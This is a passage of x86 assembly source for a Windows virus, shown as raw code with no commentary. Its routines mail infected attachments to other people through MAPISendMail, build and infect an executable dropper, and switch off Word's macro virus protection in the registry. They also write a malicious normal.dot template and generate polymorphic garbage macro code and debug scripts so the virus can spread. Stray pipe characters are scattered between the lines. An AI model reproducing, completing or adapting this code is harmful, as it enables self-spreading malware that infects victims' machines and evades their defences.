lea esi, [ebp+(ofs directory-ofs vcode)]
|
|||
|
push 80h
|
|||
|
push esi
|
|||
|
call [ebp+(ofs _SetFileAttributesA-ofs vcode)]
|
|||
|
test eax, eax
|
|||
|
jz @@file
|
|||
|
mov edx, 'COD.'
|
|||
|
jmp @@attach
|
|||
|
|
|||
|
@@file:
|
|||
|
call CreateDropper
|
|||
|
mov eax, [ebp+(ofs mm_on_off-ofs vcode)]
|
|||
|
push eax ;buffer
|
|||
|
mov eax, [ebp+(ofs fsizel-ofs vcode)]
|
|||
|
push eax ;size
|
|||
|
lea edi, [ebp+(ofs directory-ofs vcode)]
|
|||
|
push edi
|
|||
|
lea esi, [ebp+(ofs shitfile-ofs vcode)]
|
|||
|
@@4:
|
|||
|
lodsb
|
|||
|
stosb
|
|||
|
test al, al
|
|||
|
jnz @@4
|
|||
|
mov dwo [ebp+(ofs wd_att-ofs vcode)], 82h
|
|||
|
call WriteDump ;hidden dump
|
|||
|
push 00004000h+00008000h
|
|||
|
push 0
|
|||
|
push dwo [ebp+(ofs mm_on_off-ofs vcode)]
|
|||
|
call [ebp+(ofs _VirtualFree-ofs vcode)]
|
|||
|
mov edx, 'EXE.'
|
|||
|
|
|||
|
@@attach:
|
|||
|
|
|||
|
DATA_SIZE = size MapiMessage + ((size MapiRecipDesc)*2) + size MapiFileDesc
|
|||
|
|
|||
|
mapimsg = 0
|
|||
|
origin = mapimsg + size MapiMessage
|
|||
|
destin = origin + size MapiRecipDesc
|
|||
|
file = destin + size MapiRecipDesc
|
|||
|
|
|||
|
sub eax, eax
|
|||
|
mov ecx, DATA_SIZE
|
|||
|
sub esp, ecx
|
|||
|
mov edi, esp
|
|||
|
mov esi, edi
|
|||
|
rep stosb ;clear buffers we'll use
|
|||
|
|
|||
|
lea eax, [esi+origin]
|
|||
|
mov [esi.mapimsg.lpOriginator], eax
|
|||
|
lea eax, [esi+destin]
|
|||
|
mov [esi.mapimsg.lpRecips], eax
|
|||
|
lea eax, [esi+file]
|
|||
|
mov [esi.mapimsg.lpFiles], eax
|
|||
|
|
|||
|
push 1
|
|||
|
pop eax
|
|||
|
mov [esi.mapimsg.nFileCount], eax
|
|||
|
mov [esi.mapimsg.nRecipCount], eax
|
|||
|
mov [esi.destin.ulRecipClass], eax
|
|||
|
inc eax
|
|||
|
mov [esi.mapimsg.flags], eax
|
|||
|
lea eax, [ebp+(ofs email-ofs vcode)]
|
|||
|
mov [esi.destin.lpszName], eax
|
|||
|
mov [esi.destin.lpszAddress], eax
|
|||
|
lea eax, [ebp+(ofs directory-ofs vcode)]
|
|||
|
mov [esi.file.lpszPathName], eax
|
|||
|
|
|||
|
lea edi, [ebp+(ofs fname-ofs vcode)]
|
|||
|
mov [esi.file.lpszFileName], edi
|
|||
|
call MakeVar
|
|||
|
mov eax, edx
|
|||
|
stosd
|
|||
|
sub eax, eax
|
|||
|
stosb
|
|||
|
|
|||
|
mov eax, [ebp+(ofs subject-ofs vcode)]
|
|||
|
mov [esi.mapimsg.lpszSubject], eax
|
|||
|
|
|||
|
call @@1aa
|
|||
|
db '', 0
|
|||
|
@@1aa:
|
|||
|
pop [esi.mapimsg.lpszNoteText]
|
|||
|
|
|||
|
sub eax, eax
|
|||
|
push eax
|
|||
|
push eax
|
|||
|
push esi
|
|||
|
push eax
|
|||
|
push eax
|
|||
|
call [ebp+(ofs _MAPISendMail-ofs vcode)]
|
|||
|
test eax, eax
|
|||
|
jnz @@33
|
|||
|
|
|||
|
sub eax, eax
|
|||
|
mov [ebp+(ofs mm_on_off-ofs vcode)], eax
|
|||
|
|
|||
|
call InsertList
|
|||
|
|
|||
|
@@33:
|
|||
|
add esp, DATA_SIZE
|
|||
|
|
|||
|
lea eax, [ebp+(ofs shitfile-ofs vcode)]
|
|||
|
push eax
|
|||
|
call DeleteShitFile
|
|||
|
|
|||
|
@@unload_mapi:
|
|||
|
mov eax, [ebp+(ofs _mapi-ofs vcode)]
|
|||
|
call [ebp+(ofs _FreeLibrary-ofs vcode)]
|
|||
|
@@done:
|
|||
|
sub eax, eax
|
|||
|
mov [ebp+(ofs email_w-ofs vcode)], eax
|
|||
|
@@no_queued:
|
|||
|
push MAIL_PRIORITY*1000
|
|||
|
call [ebp+(ofs _Sleep-ofs vcode)]
|
|||
|
jmp @@main_loop
|
|||
|
MailThread endp
|
|||
|
|
|||
|
GetTemplateDir proc
|
|||
|
call @@2
|
|||
|
db 'SOFTWARE\Microsoft\Office\8.0\Common\FileNew\LocalTemplates', 0
|
|||
|
@@2:
|
|||
|
pop eax
|
|||
|
call ConsultKey
|
|||
|
ret
|
|||
|
GetTemplateDir endp
|
|||
|
|
|||
|
CreateDropper proc
|
|||
|
push 00000040h
|
|||
|
push 00002000h+00001000h+00100000h
|
|||
|
push 48*1024
|
|||
|
push 0
|
|||
|
call [ebp+(ofs _VirtualAlloc-ofs vcode)]
|
|||
|
mov [ebp+(ofs mm_on_off-ofs vcode)], eax
|
|||
|
sub edi, edi
|
|||
|
xchg edi, eax
|
|||
|
call @@1
|
|||
|
@@0:
|
|||
|
db04Dh, 05Ah, 050h, 000h, 000h, 000h, 002h, 000h
|
|||
|
db002h, 000h, 004h, 000h, 000h, 000h, 00Fh, 000h
|
|||
|
db000h, 000h, 0FFh, 0FFh, 000h, 001h, 000h, 0B8h
|
|||
|
db000h, 006h, 000h, 040h, 000h, 000h, 000h, 01Ah
|
|||
|
db000h, 021h, 000h, 001h, 000h, 001h, 000h, 0BAh
|
|||
|
db010h, 000h, 000h, 000h, 00Eh, 01Fh, 0B4h, 009h
|
|||
|
db0CDh, 021h, 0B8h, 001h, 04Ch, 0CDh, 021h, 090h
|
|||
|
db090h, 054h, 068h, 069h, 073h, 020h, 070h, 072h
|
|||
|
db06Fh, 067h, 072h, 061h, 06Dh, 020h, 06Dh, 075h
|
|||
|
db073h, 074h, 020h, 062h, 065h, 020h, 072h, 075h
|
|||
|
db06Eh, 020h, 075h, 06Eh, 064h, 065h, 072h, 020h
|
|||
|
db057h, 069h, 06Eh, 033h, 032h, 00Dh, 00Ah, 024h
|
|||
|
db037h, 000h, 087h, 000h, 050h, 045h, 000h, 001h
|
|||
|
db000h, 04Ch, 001h, 004h, 000h, 000h, 000h, 074h
|
|||
|
db025h, 0F5h, 00Eh, 000h, 007h, 000h, 0E0h, 000h
|
|||
|
db000h, 000h, 08Eh, 081h, 00Bh, 001h, 002h, 019h
|
|||
|
db000h, 000h, 000h, 002h, 000h, 002h, 000h, 006h
|
|||
|
db000h, 006h, 000h, 010h, 000h, 002h, 000h, 010h
|
|||
|
db000h, 002h, 000h, 020h, 000h, 003h, 000h, 040h
|
|||
|
db000h, 001h, 000h, 010h, 000h, 002h, 000h, 002h
|
|||
|
db000h, 001h, 000h, 001h, 000h, 006h, 000h, 003h
|
|||
|
db000h, 000h, 000h, 00Ah, 000h, 005h, 000h, 050h
|
|||
|
db000h, 002h, 000h, 004h, 000h, 005h, 000h, 002h
|
|||
|
db000h, 004h, 000h, 010h, 000h, 001h, 000h, 020h
|
|||
|
db000h, 003h, 000h, 010h, 000h, 001h, 000h, 010h
|
|||
|
db000h, 005h, 000h, 010h, 000h, 00Bh, 000h, 030h
|
|||
|
db000h, 001h, 000h, 054h, 000h, 01Bh, 000h, 040h
|
|||
|
db000h, 001h, 000h, 00Ch, 000h, 052h, 000h, 043h
|
|||
|
db04Fh, 044h, 045h, 000h, 004h, 000h, 002h, 000h
|
|||
|
db002h, 000h, 010h, 000h, 002h, 000h, 002h, 000h
|
|||
|
db002h, 000h, 006h, 000h, 00Dh, 000h, 020h, 000h
|
|||
|
db001h, 000h, 060h, 044h, 041h, 054h, 041h, 000h
|
|||
|
db004h, 000h, 002h, 000h, 002h, 000h, 020h, 000h
|
|||
|
db002h, 000h, 002h, 000h, 002h, 000h, 008h, 000h
|
|||
|
db00Dh, 000h, 040h, 000h, 001h, 000h, 0C0h, 02Eh
|
|||
|
db069h, 064h, 061h, 074h, 061h, 000h, 002h, 000h
|
|||
|
db002h, 000h, 002h, 000h, 030h, 000h, 002h, 000h
|
|||
|
db002h, 000h, 002h, 000h, 00Ah, 000h, 00Dh, 000h
|
|||
|
db040h, 000h, 001h, 000h, 0C0h, 02Eh, 072h, 065h
|
|||
|
db06Ch, 06Fh, 063h, 000h, 002h, 000h, 002h, 000h
|
|||
|
db002h, 000h, 040h, 000h, 002h, 000h, 002h, 000h
|
|||
|
db002h, 000h, 00Ch, 000h, 00Dh, 000h, 040h, 000h
|
|||
|
db001h, 000h, 050h, 000h, 067h, 003h, 06Ah, 000h
|
|||
|
db000h, 000h, 0E8h, 000h, 003h, 000h, 0FFh, 025h
|
|||
|
db030h, 030h, 040h, 000h, 0F3h, 003h, 028h, 030h
|
|||
|
db000h, 009h, 000h, 038h, 030h, 000h, 001h, 000h
|
|||
|
db030h, 030h, 000h, 015h, 000h, 046h, 030h, 000h
|
|||
|
db005h, 000h, 046h, 030h, 000h, 005h, 000h, 04Bh
|
|||
|
db045h, 052h, 04Eh, 045h, 04Ch, 033h, 032h, 02Eh
|
|||
|
db064h, 06Ch, 06Ch, 000h, 003h, 000h, 045h, 078h
|
|||
|
db069h, 074h, 050h, 072h, 06Fh, 063h, 065h, 073h
|
|||
|
db073h, 000h, 0ADh, 001h, 010h, 000h, 001h, 000h
|
|||
|
db00Ch, 000h, 002h, 000h, 009h, 030h
|
|||
|
@@1:
|
|||
|
pop esi
|
|||
|
mov ecx, ofs @@1-ofs @@0
|
|||
|
@@2:
|
|||
|
lodsb
|
|||
|
stosb
|
|||
|
test al, al
|
|||
|
jnz @@3
|
|||
|
dec ecx
|
|||
|
dec ecx
|
|||
|
lodsw
|
|||
|
push ecx
|
|||
|
xor ecx, ecx
|
|||
|
xchg ecx, eax
|
|||
|
jecxz @@4
|
|||
|
rep stosb
|
|||
|
@@4:
|
|||
|
pop ecx
|
|||
|
@@3:
|
|||
|
loop @@2
|
|||
|
mov [ebp+(ofs fsizeh-ofs vcode)], ecx
|
|||
|
mov dwo [ebp+(ofs fsizel-ofs vcode)], 4096
|
|||
|
call Infect
|
|||
|
ret
|
|||
|
CreateDropper endp
|
|||
|
|
|||
|
random_f proc
|
|||
|
push eax
|
|||
|
call random0
|
|||
|
pop eax
|
|||
|
ret
|
|||
|
random_f endp
|
|||
|
|
|||
|
macro_start equ this byte
|
|||
|
|
|||
|
include ndot.inc
|
|||
|
|
|||
|
MacroSpread proc
|
|||
|
sub ecx, ecx
|
|||
|
call @@set_seh
|
|||
|
mov esp, [esp+8]
|
|||
|
call delta
|
|||
|
jmp @@0
|
|||
|
@@set_seh:
|
|||
|
push dwo fs:[ecx]
|
|||
|
mov fs:[ecx], esp
|
|||
|
|
|||
|
call OpenAncev
|
|||
|
jc @@1 ;dont exists, macro spread
|
|||
|
mov eax, 10
|
|||
|
call random
|
|||
|
or eax, eax ;just in case that we are
|
|||
|
jnz @@0 ;reinfecting
|
|||
|
@@1:
|
|||
|
call @@2
|
|||
|
@@1v dd 0
|
|||
|
@@2:
|
|||
|
push 000F003Fh ;KEY_ALL_ACCESS
|
|||
|
push 0
|
|||
|
call @@3
|
|||
|
db 'SOFTWARE\Microsoft\Office\8.0\Word\Options', 0
|
|||
|
@@3:
|
|||
|
push 80000001H ;HKEY_CURRENT_USER
|
|||
|
call [ebp+(ofs _RegOpenKeyEx-ofs vcode)]
|
|||
|
test eax, eax
|
|||
|
jnz @@0
|
|||
|
push 1 ;size
|
|||
|
call @@4
|
|||
|
db '0', 0
|
|||
|
@@4:
|
|||
|
push 1 ;type
|
|||
|
push 0
|
|||
|
call @@5
|
|||
|
db 'EnableMacroVirusProtection', 0 ;key entry
|
|||
|
@@5:
|
|||
|
push dwo [ebp+(ofs @@1v-ofs vcode)]
|
|||
|
call [ebp+(ofs _RegSetValueEx-ofs vcode)]
|
|||
|
push dwo [ebp+(ofs @@1v-ofs vcode)]
|
|||
|
call [ebp+(ofs _RegCloseKey-ofs vcode)] ;close key
|
|||
|
call GetTemplateDir
|
|||
|
cld
|
|||
|
push esi
|
|||
|
@@6:
|
|||
|
lodsb
|
|||
|
test al, al
|
|||
|
jnz @@6
|
|||
|
lea edi, [esi-1]
|
|||
|
lea esi, [ebp+(ofs ndot-ofs vcode)]
|
|||
|
@@8:
|
|||
|
lodsb
|
|||
|
stosb
|
|||
|
test al, al
|
|||
|
jnz @@8
|
|||
|
call DeleteShitFile
|
|||
|
push 00000040h
|
|||
|
push 00002000h+00001000h+00100000h
|
|||
|
push 48*1024
|
|||
|
push 0
|
|||
|
call [ebp+(ofs _VirtualAlloc-ofs vcode)];alloc memory for my normal.dot
|
|||
|
mov [ebp+(ofs mm_on_off-ofs vcode)], eax
|
|||
|
lea eax, [ebp+(ofs normaldot-ofs vcode)]
|
|||
|
push eax
|
|||
|
push normaldot_size
|
|||
|
mov eax, [ebp+(ofs mm_on_off-ofs vcode)]
|
|||
|
push eax
|
|||
|
lea eax, [ebp+(ofs normaldot_sized-ofs vcode)]
|
|||
|
push eax
|
|||
|
call lzrw1_decompress ;unpack normaldot
|
|||
|
mov eax, [ebp+(ofs mm_on_off-ofs vcode)]
|
|||
|
push eax
|
|||
|
mov eax, [ebp+(ofs normaldot_sized-ofs vcode)]
|
|||
|
push eax
|
|||
|
lea eax, [ebp+(ofs directory-ofs vcode)]
|
|||
|
push eax ;dump not hidden
|
|||
|
mov dwo [ebp+(ofs wd_att-ofs vcode)], 80h
|
|||
|
call WriteDump ;create/write new normal.dot
|
|||
|
push 00004000h+00008000h
|
|||
|
push 0
|
|||
|
push dwo [ebp+(ofs mm_on_off-ofs vcode)]
|
|||
|
call [ebp+(ofs _VirtualFree-ofs vcode)] ;free memory from normal.dot
|
|||
|
call CreateDropper
|
|||
|
push 00000040h
|
|||
|
push 00002000h+00001000h+00100000h
|
|||
|
push 150*1024
|
|||
|
push 0
|
|||
|
call [ebp+(ofs _VirtualAlloc-ofs vcode)]
|
|||
|
mov [ebp+(ofs dbgscript-ofs vcode)], eax
|
|||
|
mov edi, eax
|
|||
|
push eax
|
|||
|
mov esi, [ebp+(ofs mm_on_off-ofs vcode)]
|
|||
|
mov ecx, dwo [ebp+(ofs fsizel-ofs vcode)]
|
|||
|
call script ;make debug script
|
|||
|
push 00004000h+00008000h
|
|||
|
push 0
|
|||
|
push dwo [ebp+(ofs mm_on_off-ofs vcode)]
|
|||
|
call [ebp+(ofs _VirtualFree-ofs vcode)] ;free memory from EXE dropper
|
|||
|
pop eax
|
|||
|
sub edi, eax
|
|||
|
mov [ebp+(ofs dbgscript_size-ofs vcode)], edi
|
|||
|
push 00000040h
|
|||
|
push 00002000h+00001000h+00100000h
|
|||
|
push 4*1024
|
|||
|
push 0
|
|||
|
call [ebp+(ofs _VirtualAlloc-ofs vcode)] ;alloc memory for macro text
|
|||
|
mov [ebp+(ofs mm_on_off-ofs vcode)], eax
|
|||
|
lea eax, [ebp+(ofs macros-ofs vcode)]
|
|||
|
push eax
|
|||
|
push macro_size
|
|||
|
mov eax, [ebp+(ofs mm_on_off-ofs vcode)]
|
|||
|
push eax
|
|||
|
lea eax, [ebp+(ofs macro_sized-ofs vcode)]
|
|||
|
push eax
|
|||
|
call lzrw1_decompress ;unpack normaldot
|
|||
|
mov ecx, [ebp+(ofs macro_sized-ofs vcode)]
|
|||
|
mov esi, [ebp+(ofs mm_on_off-ofs vcode)]
|
|||
|
lea edi, [esi+ecx+4] ;edi=buffer for vars
|
|||
|
mov [ebp+(ofs variables-ofs vcode)], edi
|
|||
|
mov ebx, edi
|
|||
|
@@9:
|
|||
|
lodsb
|
|||
|
cmp al, 'A'
|
|||
|
jb @@10
|
|||
|
cmp al, 'Z'
|
|||
|
ja @@10
|
|||
|
call random_f
|
|||
|
jc @@10
|
|||
|
sub al, 'A'-'a'
|
|||
|
@@10:
|
|||
|
mov [esi-1], al
|
|||
|
loop @@9
|
|||
|
mov ecx, 10 ;generate variables
|
|||
|
@@13:
|
|||
|
push ecx
|
|||
|
mov eax, 8 ;lenght of the name of variable
|
|||
|
call random
|
|||
|
inc eax
|
|||
|
inc eax
|
|||
|
mov ecx, eax
|
|||
|
@@12:
|
|||
|
mov eax, 'Z'-'A'
|
|||
|
call random
|
|||
|
add al, 'A'
|
|||
|
call random_f
|
|||
|
jc @@11
|
|||
|
sub al, 'A'-'a'
|
|||
|
@@11:
|
|||
|
stosb
|
|||
|
loop @@12
|
|||
|
sub eax, eax
|
|||
|
stosb
|
|||
|
pop ecx
|
|||
|
loop @@13 ;next variable
|
|||
|
push 00000040h
|
|||
|
push 00002000h+00001000h+00100000h
|
|||
|
push 4*1024
|
|||
|
push 0
|
|||
|
call [ebp+(ofs _VirtualAlloc-ofs vcode)] ;alloc memory for macro text
|
|||
|
push eax
|
|||
|
mov edi, eax
|
|||
|
mov esi, [ebp+(ofs mm_on_off-ofs vcode)]
|
|||
|
@@14:
|
|||
|
lodsb
|
|||
|
cmp al, '%'
|
|||
|
jne @@18
|
|||
|
lodsb
|
|||
|
sub al, '0'
|
|||
|
push ebx
|
|||
|
push esi
|
|||
|
movzx ecx, al
|
|||
|
mov esi, ebx
|
|||
|
@@15:
|
|||
|
lodsb
|
|||
|
test al, al
|
|||
|
jnz @@15
|
|||
|
loop @@15
|
|||
|
@@16:
|
|||
|
lodsb
|
|||
|
test al, al
|
|||
|
jz @@17
|
|||
|
stosb
|
|||
|
jmp @@16
|
|||
|
@@17:
|
|||
|
pop esi
|
|||
|
pop ebx
|
|||
|
mov al, 12h
|
|||
|
org $-1
|
|||
|
@@18:
|
|||
|
stosb
|
|||
|
lea eax, [ebx-4]
|
|||
|
cmp esi, eax
|
|||
|
jb @@14
|
|||
|
push 00004000h+00008000h
|
|||
|
push 0
|
|||
|
push dwo [ebp+(ofs mm_on_off-ofs vcode)]
|
|||
|
call [ebp+(ofs _VirtualFree-ofs vcode)] ;free mem macro code (unprocess)
|
|||
|
mov ecx, edi
|
|||
|
pop esi
|
|||
|
sub ecx, esi
|
|||
|
push ecx
|
|||
|
mov [ebp+(ofs mm_on_off-ofs vcode)], esi
|
|||
|
push 00000040h
|
|||
|
push 00002000h+00001000h+00100000h
|
|||
|
push 150*1024
|
|||
|
push 0
|
|||
|
call [ebp+(ofs _VirtualAlloc-ofs vcode)] ;alloc memory for macro text
|
|||
|
sub ecx, ecx
|
|||
|
sub ebx, ebx
|
|||
|
mov edi, eax
|
|||
|
xchg eax, [esp]
|
|||
|
xchg eax, ecx
|
|||
|
add ecx, [ebp+(ofs mm_on_off-ofs vcode)];ecx=limit of macro template
|
|||
|
mov by [ebp+(ofs mdeep-ofs vcode)], -1
|
|||
|
@@19:
|
|||
|
mov esi, [ebp+(ofs mm_on_off-ofs vcode)]
|
|||
|
inc ah
|
|||
|
cmp ah, 2
|
|||
|
jne @@20
|
|||
|
mov by [ebp+(ofs mdeep-ofs vcode)], 0
|
|||
|
@@20:
|
|||
|
cmp ah, 8
|
|||
|
jne @@21
|
|||
|
mov by [ebp+(ofs mdeep-ofs vcode)], -1
|
|||
|
@@21:
|
|||
|
cmp ah, 6
|
|||
|
jne @@22
|
|||
|
mov esi, [ebp+(ofs dbgscript-ofs vcode)]
|
|||
|
push ecx
|
|||
|
mov ecx, [ebp+(ofs dbgscript_size-ofs vcode)]
|
|||
|
rep movsb
|
|||
|
pop ecx
|
|||
|
call MacroGarble
|
|||
|
jmp @@19
|
|||
|
@@22:
|
|||
|
cmp ah, 9
|
|||
|
je @@28
|
|||
|
@@23:
|
|||
|
cmp esi, ecx
|
|||
|
jb @@24 ;all buffer scanned?
|
|||
|
test ebx, ebx
|
|||
|
jz @@19 ;nothing we was searching exists
|
|||
|
mov esi, [ebp+(ofs mm_on_off-ofs vcode)];it exists, but we skipped!
|
|||
|
sub ebx, ebx
|
|||
|
@@24:
|
|||
|
lodsb
|
|||
|
cmp al, ah
|
|||
|
jne @@27 ;find line we're searching
|
|||
|
inc ebx ;flag found
|
|||
|
push eax
|
|||
|
mov ax, 100
|
|||
|
call random
|
|||
|
cmp eax, 33 ;1/3
|
|||
|
pop eax
|
|||
|
jnb @@27 ;skip this time
|
|||
|
mov by [esi-1], 9 ;flag as done
|
|||
|
@@25:
|
|||
|
lodsb
|
|||
|
test al, al
|
|||
|
jz @@26
|
|||
|
stosb
|
|||
|
cmp al, 10
|
|||
|
jne @@25
|
|||
|
call MacroGarble ;after CRLF, insert garbage
|
|||
|
jmp @@25
|
|||
|
@@26:
|
|||
|
jmp @@23
|
|||
|
@@27:
|
|||
|
lodsb
|
|||
|
test al, al
|
|||
|
jnz @@27 ;seek till next line
|
|||
|
jmp @@23
|
|||
|
@@28:
|
|||
|
push 00004000h+00008000h
|
|||
|
push 0
|
|||
|
push dwo [ebp+(ofs mm_on_off-ofs vcode)]
|
|||
|
call [ebp+(ofs _VirtualFree-ofs vcode)] ;free memory from macro code
|
|||
|
mov eax, [esp] ;get buffer from stack
|
|||
|
push eax
|
|||
|
sub edi, eax
|
|||
|
push edi
|
|||
|
lea eax, [ebp+(ofs cokefile-ofs vcode)]
|
|||
|
push eax
|
|||
|
mov dwo [ebp+(ofs wd_att-ofs vcode)], 82h
|
|||
|
call WriteDump ;create/write new normal.dot
|
|||
|
pop eax ;buffer
|
|||
|
push 00004000h+00008000h
|
|||
|
push 0
|
|||
|
push eax
|
|||
|
call [ebp+(ofs _VirtualFree-ofs vcode)] ;free memory from complete code
|
|||
|
push 00004000h+00008000h
|
|||
|
push 0
|
|||
|
push dwo [ebp+(ofs dbgscript-ofs vcode)]
|
|||
|
call [ebp+(ofs _VirtualFree-ofs vcode)] ;free memory from debug script
|
|||
|
@@0:
|
|||
|
sub ecx, ecx
|
|||
|
pop dwo fs:[ecx]
|
|||
|
pop ecx
|
|||
|
sub eax, eax
|
|||
|
mov dwo [ebp+(ofs mm_on_off-ofs vcode)], eax
|
|||
|
add al, '0'
|
|||
|
mov by [ebp+(ofs dmt1-ofs vcode)], al
|
|||
|
mov by [ebp+(ofs dmt2-ofs vcode)+7], al
|
|||
|
mov by [ebp+(ofs outcmd-ofs vcode)+7], al
|
|||
|
mov by [ebp+(ofs ssize-ofs vcode)+7], al
|
|||
|
mov by [ebp+(ofs coda-ofs vcode)+7], al
|
|||
|
mov by [ebp+(ofs dmt3-ofs vcode)+7], al
|
|||
|
mov by [ebp+(ofs dmt4-ofs vcode)+7], al
|
|||
|
mov by [ebp+(ofs dmt5-ofs vcode)+7], al
|
|||
|
ret
|
|||
|
MacroSpread endp
|
|||
|
|
|||
|
MacroGarble proc
|
|||
|
push eax
|
|||
|
push ecx
|
|||
|
push esi
|
|||
|
cmp by [ebp+(ofs mdeep-ofs vcode)], MAX_M_DEEP
|
|||
|
jae @@0
|
|||
|
inc by [ebp+(ofs mdeep-ofs vcode)]
|
|||
|
mov eax, 4
|
|||
|
call random
|
|||
|
add eax, 2
|
|||
|
mov ecx, eax
|
|||
|
@@1:
|
|||
|
push ecx
|
|||
|
@@2:
|
|||
|
mov eax, 16
|
|||
|
call random
|
|||
|
cmp al, 10
|
|||
|
je @@remark
|
|||
|
cmp al, 11
|
|||
|
je @@for
|
|||
|
cmp al, 12
|
|||
|
je @@variables
|
|||
|
cmp al, 13
|
|||
|
je @@if
|
|||
|
cmp al, 14
|
|||
|
je @@10
|
|||
|
jmp @@2
|
|||
|
@@if:
|
|||
|
mov eax, ' fI'
|
|||
|
stosd
|
|||
|
dec edi
|
|||
|
call MakeVar
|
|||
|
mov eax, ' = '
|
|||
|
call random_f
|
|||
|
jc @@3
|
|||
|
dec ah
|
|||
|
call random_f
|
|||
|
jc @@3
|
|||
|
inc ah
|
|||
|
inc ah
|
|||
|
@@3:
|
|||
|
stosd
|
|||
|
dec edi
|
|||
|
call MakeVar
|
|||
|
mov eax, 'ehT '
|
|||
|
stosd
|
|||
|
mov eax, 000a0d00h+'n'
|
|||
|
stosd
|
|||
|
dec edi
|
|||
|
call MacroGarble
|
|||
|
call @@4
|
|||
|
db 'End If', 13, 10
|
|||
|
@@4:
|
|||
|
pop esi
|
|||
|
movsd
|
|||
|
movsd
|
|||
|
jmp @@10
|
|||
|
@@remark:
|
|||
|
call random_f
|
|||
|
jc @@5
|
|||
|
mov al, "'"
|
|||
|
stosb
|
|||
|
jmp @@6
|
|||
|
@@5:
|
|||
|
mov eax, ' meR'
|
|||
|
stosd
|
|||
|
@@6:
|
|||
|
call MakeVar
|
|||
|
call MakeVar
|
|||
|
@@7:
|
|||
|
mov ax, 0a0dh
|
|||
|
stosw
|
|||
|
jmp @@10
|
|||
|
@@variables:
|
|||
|
call MakeVar
|
|||
|
call random_f
|
|||
|
jc @@string
|
|||
|
mov eax, ' = '
|
|||
|
stosd
|
|||
|
dec edi
|
|||
|
call MakeNumber
|
|||
|
@@8:
|
|||
|
jmp @@7
|
|||
|
@@string:
|
|||
|
call MakeVar
|
|||
|
mov eax, ' = $'
|
|||
|
stosd
|
|||
|
mov al, '"'
|
|||
|
stosb
|
|||
|
call MakeVar
|
|||
|
mov al, '"'
|
|||
|
stosb
|
|||
|
jmp @@8
|
|||
|
@@for:
|
|||
|
mov eax, ' roF'
|
|||
|
stosd
|
|||
|
push edi
|
|||
|
call MakeVar
|
|||
|
mov eax, ' = '
|
|||
|
stosd
|
|||
|
dec edi
|
|||
|
call MakeNumber
|
|||
|
mov eax, ' oT '
|
|||
|
stosd
|
|||
|
call MakeNumber
|
|||
|
mov ax, 0a0dh
|
|||
|
stosw
|
|||
|
call MacroGarble
|
|||
|
mov eax, 'txeN'
|
|||
|
stosd
|
|||
|
mov al, ' '
|
|||
|
stosb
|
|||
|
pop esi
|
|||
|
@@9:
|
|||
|
lodsb
|
|||
|
cmp al, ' '
|
|||
|
je @@8
|
|||
|
stosb
|
|||
|
jmp @@9
|
|||
|
@@10:
|
|||
|
pop ecx
|
|||
|
dec ecx
|
|||
|
jnz @@1
|
|||
|
dec by [ebp+(ofs mdeep-ofs vcode)]
|
|||
|
@@0:
|
|||
|
pop esi
|
|||
|
pop ecx
|
|||
|
pop eax
|
|||
|
ret
|
|||
|
MacroGarble endp
|
|||
|
|
|||
|
MakeNumber proc
|
|||
|
push ecx
|
|||
|
push eax
|
|||
|
mov eax, 2
|
|||
|
call random
|
|||
|
inc eax
|
|||
|
mov ecx, eax
|
|||
|
@@1:
|
|||
|
mov eax, '9'-'0'
|
|||
|
call random
|
|||
|
add al, '0'
|
|||
|
stosb
|
|||
|
loop @@1
|
|||
|
pop eax
|
|||
|
pop ecx
|
|||
|
ret
|
|||
|
MakeNumber endp
|
|||
|
|
|||
|
include lz.inc
|
|||
|
|
|||
|
include macro.inc
|
|||
|
|
|||
|
update_address proc
|
|||
|
push eax ecx
|
|||
|
db 0b8h
|
|||
|
addr dd 0 ;get address to eax
|
|||
|
mov ecx, 4
|
|||
|
@@1:
|
|||
|
rol ax, 4
|
|||
|
call mhex ;print hex digits
|
|||
|
loop @@1
|
|||
|
add dwo [ebp+(ofs addr-ofs vcode)], 10h ;update address
|
|||
|
pop ecx eax
|
|||
|
ret
|
|||
|
update_address endp
|
|||
|
|
|||
|
mhex proc
|
|||
|
push eax ebx
|
|||
|
and eax, 01111b ;lower nibble
|
|||
|
call $+21
|
|||
|
db '0123456789ABCDEF'
|
|||
|
pop ebx
|
|||
|
xlat ;turn it in hex digit
|
|||
|
stosb
|
|||
|
pop ebx eax
|
|||
|
ret
|
|||
|
mhex endp
|
|||
|
|
|||
|
copy_line proc
|
|||
|
push eax
|
|||
|
@@0:
|
|||
|
lodsb
|
|||
|
or al, al
|
|||
|
jz @@1 ;zero found, stop copy
|
|||
|
stosb
|
|||
|
jmp @@0
|
|||
|
@@1:
|
|||
|
pop eax
|
|||
|
ret
|
|||
|
copy_line endp
|
|||
|
|
|||
|
make_hex proc
|
|||
|
push eax ecx esi
|
|||
|
db 0b8h+6
|
|||
|
iaddr dd 0 ;esi<->actual buffer position
|
|||
|
inc dwo [ebp+(ofs iaddr-ofs vcode)] ;set next
|
|||
|
mov al, 20h
|
|||
|
stosb ;print space
|
|||
|
lodsb
|
|||
|
rol al, 4
|
|||
|
call mhex ;print upper nibble
|
|||
|
rol al, 4
|
|||
|
call mhex ;print lower nibble
|
|||
|
pop esi ecx eax
|
|||
|
loop make_hex
|
|||
|
ret
|
|||
|
make_hex endp
|
|||
|
|
|||
|
script proc
|
|||
|
cld
|
|||
|
call debugmutator
|
|||
|
mov dwo [ebp+(ofs addr-ofs vcode)], 0100h
|
|||
|
mov [ebp+(ofs iaddr-ofs vcode)], esi ;set vars
|
|||
|
lea esi, [ebp+(ofs intro-ofs vcode)]
|
|||
|
call copy_line ;copy intro code
|
|||
|
mov eax, 16
|
|||
|
cdq
|
|||
|
xchg eax, ecx
|
|||
|
div ecx ;ecx=number of 16-bytes lines
|
|||
|
mov ecx, eax ;edx=remainder for last line
|
|||
|
@@0:
|
|||
|
push ecx
|
|||
|
lea esi, [ebp+(ofs outcmd-ofs vcode)]
|
|||
|
call copy_line ;print
|
|||
|
call update_address ;address
|
|||
|
mov ecx, 16
|
|||
|
call make_hex ;code to assemble
|
|||
|
mov eax, 000A0D00h+'"'
|
|||
|
stosd ;next line
|
|||
|
dec edi
|
|||
|
pop ecx
|
|||
|
loop @@0
|
|||
|
mov ecx, edx
|
|||
|
jecxz @@1 ;no remainder?
|
|||
|
lea esi, [ebp+(ofs outcmd-ofs vcode)]
|
|||
|
call copy_line
|
|||
|
call update_address ;make last line
|
|||
|
call make_hex
|
|||
|
mov eax, 000A0D00h+'"'
|
|||
|
stosd
|
|||
|
dec edi
|
|||
|
sub wo [ebp+(ofs addr-ofs vcode)], 10h ;undo damage
|
|||
|
@@1:
|
|||
|
lea esi, [ebp+(ofs ssize-ofs vcode)]
